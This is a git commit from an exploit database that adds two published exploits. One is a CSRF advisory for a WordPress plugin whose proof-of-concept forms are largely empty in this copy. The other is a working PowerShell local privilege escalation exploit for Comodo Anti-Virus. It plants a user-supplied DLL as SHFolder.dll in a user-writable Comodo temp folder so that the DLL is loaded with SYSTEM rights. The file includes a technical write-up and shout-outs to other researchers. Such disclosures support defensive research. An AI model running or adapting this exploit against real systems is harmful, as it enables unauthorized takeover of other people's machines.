From a4526e0949a8604aa1c2277f2ecb9fb2dbeb5954 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 1 Mar 2016 05:02:23 +0000 Subject: [PATCH] DB: 2016-03-01 2 new exploits --- files.csv | 2 + platforms/php/webapps/39507.txt | 65 ++++++++ platforms/windows/local/39508.ps1 | 261 ++++++++++++++++++++++++++++++ 3 files changed, 328 insertions(+) create mode 100755 platforms/php/webapps/39507.txt create mode 100755 platforms/windows/local/39508.ps1 diff --git a/files.csv b/files.csv index 9cfafac72..8bee23f73 100755 --- a/files.csv +++ b/files.csv @@ -35745,3 +35745,5 @@ id,file,description,date,author,platform,type,port 39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0 39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0 39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 +39507,platforms/php/webapps/39507.txt,"WordPress More Fields <= 2.1 Plugin - CSRF Vulnerability",2016-02-29,"Aatif Shahdad",php,webapps,80 +39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus SHFolder.DLL - Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 diff --git a/platforms/php/webapps/39507.txt b/platforms/php/webapps/39507.txt new file mode 100755 index 000000000..71ffac2fc --- /dev/null +++ b/platforms/php/webapps/39507.txt @@ -0,0 +1,65 @@ +# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery +# Date: 28-02-2016 +# Software Link: https://wordpress.org/support/plugin/more-fields +# Exploit Author: Aatif Shahdad +# Twitter: https://twitter.com/61617469665f736 +# Contact: aatif_shahdad@icloud.com +# Category: webapps + +1. Description + +The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause +a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin. + +2. Proof of Concept + +Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in. + +POC to add box named ‘test’: + +--POC begins-- +Add Boxes: + + + +
+ + + + + + + + +
+ + + + +Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’): + + + +
+ + + + +
+ + + + +Note: I have removed the CSRF tokens from the requests as they are redundant and not validated. + +--End of POC-- + + +3. Impact + +The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin. + +4. Solution: + +Add in CSRF token validation to the plugin or switch to a different plugin. The development of the Plugin has ceased so this happens to be the latest version which can’t be upgraded as of now. \ No newline at end of file diff --git a/platforms/windows/local/39508.ps1 b/platforms/windows/local/39508.ps1 new file mode 100755 index 000000000..e77d8c8ea --- /dev/null +++ b/platforms/windows/local/39508.ps1 @@ -0,0 +1,261 @@ +<# + + + ````......```` + ``,;''''''''''''''''';,` + .;''''''''''''''''''''''''''',` + `:''''''''+';:,.``````.,:;'''''''''':` + ,;'''''';,.` ``,;'''''';: + `:'''''',. `,'''''';. + `;+''+':` ,; `,''''';. + `;'''';. `` .:;'` `. `;'''''. + ` :+''';` `,``:+'' ';;'`,''; `` `` :'''';` + .'''';` ,';' '':'` ';,'`'',' :''' .''` :'''', + `;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''` + .''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''', + :''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :'''; + ;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''` + `''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''` + `'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''. + ``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''. + `''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''', + `''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''', + `''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''. + ''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''` + ''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .''' + :''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,''' + .''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'': + `''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''` + ;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+'' + ,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .''; + `''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''. + ;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `''' + `'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'', + '''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` ''' + .'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'': + ''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': ''' + .'', ','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''` :'';` `+': + '''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;'' + `'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'', + ` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. ''; + +'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+` + ,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `''; + ;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;'' + '': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''` + .''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'': + :'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', ''' + ;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''` + `'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''. + .''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+': + :'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':` + ;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''', + ;': '''':` :'''''''''''''''''',` .''' ''''. `+''''''''''''''''''''''''''''''''''''''''' + '', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''` + `''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `''''''''''''''''''''''''''''''''''''''''''; + .''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''', + .'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+'''''' + ,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''': + :'+ '''''': .'''';'''';'` .''' ,''''''` ,'''''; + :'' ,''''', ''''''` .'''';'''';', .'''` .''''''` '''''' + ;'' `''''''; :''''', '''''' .'''';'''';':,''''. .''''''` '''''' + ;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;''''' + ;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; '''''' + :'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `'''''' + :'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :'''''' + ,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''', + .''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .'''''''' + `''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''', + '', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ ''''''''''''''''''''''''''''''; + '': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';'; + ;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,''''''''''''''''''''''''''''; + ;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';. + :'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,` + .''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+': + '': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''. + ''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''` + :'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' ''' + .''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'': + ''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''` + ;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. ''' + .''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'': + ''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :'' + :''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` ''; + `'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'', + ;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; ''' + `'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'': + ''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, ''' + .'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'', + ''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` ''' + `';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''. + :'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `''' + ''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''` + .';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'': + ;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``''' + '''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''` + .''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'', + ,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:''; + ;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''','' + ''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',` + ''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'` + ''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .': + `'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,''; + `'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.'''; + `'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;'' + ''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. `'' + :''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' '; + ,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`': + `'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','. + :''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'. + `'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''','' + ,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.: + :''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '. + `:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+ + `,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,: + .;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' + + .:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``: + '. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`' + ;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`; + .+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;` + +: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;.., + ,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; ' + `+' :'''''''''''', `+.` '',.''',. :,''''+ ; + .', ;''''''''''''. ': ''.,''':` ;.''''.,. + :'. :''''''''''', ;'` ''.:''',':;.''':.: + ''. ,:''''',` ;+` :'.:'''' ':`''; ; + `'', ''. ::,''''``; :, ' + ;+;` .'+` ``'':'`,; '`` + ,'';. `.'';` :';'.,; '. + `,''';:::::;'''. ``+;' +` + `,:''''';,` ,,; + + + +SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares) + +Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC: + +###Technical Geeky Stuff### + +GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder. +These binaries are individual components of the Comodo Security Suite and are executed whenever +their related function is performed, updated, or uninstalled. + +The directory listing is as follows: +10/06/2015 12:08 AM . +10/06/2015 12:08 AM .. +10/02/2015 10:43 PM 27 download.cfg +10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe +10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe +10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe +10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe +10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe +10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe +10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe +10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe +10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe +10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe +10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe +10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe +10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe +10/02/2015 10:43 PM 1 survey_version.txt +10/06/2015 12:05 AM updates + +The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration: + +C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F + BUILTIN\Administrators:(OI)(CI)(ID)F + CREATOR OWNER:(OI)(CI)(IO)(ID)F + BUILTIN\Users:(OI)(CI)(ID)R + BUILTIN\Users:(CI)(ID)(special access:) + FILE_WRITE_DATA + FILE_APPEND_DATA + FILE_WRITE_EA + FILE_WRITE_ATTRIBUTES + +Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows +non-administrator users the ability to create files in the directory but not delete or modify +existing files. + +Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides +in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the +registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher + +This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM +level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe +to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder. + +During client connections to update servers and Geek Buddy executions the unit.exe binary will +launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has +hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is +executed from. + +.data:00409240 dd offset aShfolder ; "SHFOLDER" +.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA" + +During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before +looking in the other PATHS variables. + +By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an +update or client connection to secure servers (which occurs automatically at user login) a user can +elevate their privileges to SYSTEM and compromise the system fully. + + +######### GREETZ ###################################################################################### +1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled + +@taviso - keep killing it and thanks for being an inspiration +@bill_billbil - sup girl chicken rico n chill +@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang. +@hellNBak_ - drop tehm greetz like its 2003 +@hacksforpancakes - make plans for other NullCon in 2016 ;) +@jduck - we gonna juke some more toyotas next time you come visit +@hdmoore - good luck with your ventures good sir +@jsoo - dont give up good sir - you're doing awesome +@thegrugq - when i grow up i hope im half as wise as you good sir +@daveaitel - Triangular Anus logos are the best +@da_667 - AYYYYYYYYYYYYYY LMAO +@bonovoxly - Clever Girls Wear Pink on Wednesdays +Derek Soeder - Respect to you brother, keep on being awesome +Benny 29A - next time im in CZ lets get beers, im buying +Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja +Sizzop - for fixing my greetz + +######################################################################################################### + + +#> + +Param +( + + [Parameter(ValueFromPipelineByPropertyName = $true)] + [string]$DLL = "" +) + + + + +if (!(Test-Path $DLL)) +{ + throw "Fatal Error: The specified file: $DLL does not exist." +} + +Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force + +Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red + + +[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") + +$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon + + +$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path +$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath) +$objNotifyIcon.BalloonTipIcon = "Info" +$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL. +Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges" +$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis" + +$objNotifyIcon.Visible = $True +$objNotifyIcon.ShowBalloonTip(8000)